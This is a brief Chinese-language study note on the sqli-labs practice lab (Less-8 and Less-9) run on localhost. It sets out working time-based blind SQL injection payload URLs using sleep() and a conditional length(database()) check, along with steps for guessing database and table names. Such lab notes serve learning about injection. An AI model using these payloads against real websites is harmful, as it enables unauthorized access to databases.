LESS09
1.http://127.0.0.1/sqli-labs-master/Less-9/?id=1' order by 3999--+
c此时无论如何order by的值是多少都显示you are in......,所以不能使用这个判断
2.http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5)--+
他一直正在执行转圈圈~并且返回正常,说明存在漏洞(如果存在漏洞,睡眠五秒返回结果)
3.时间盲注方法进行判断(less08)
(1).http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and sleep(5)--+,使用延迟的方法判断
(2).http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if(length(database())=8,1,sleep(5))--+
(3).参考less05,先判断数据库名,然后二分法判断表名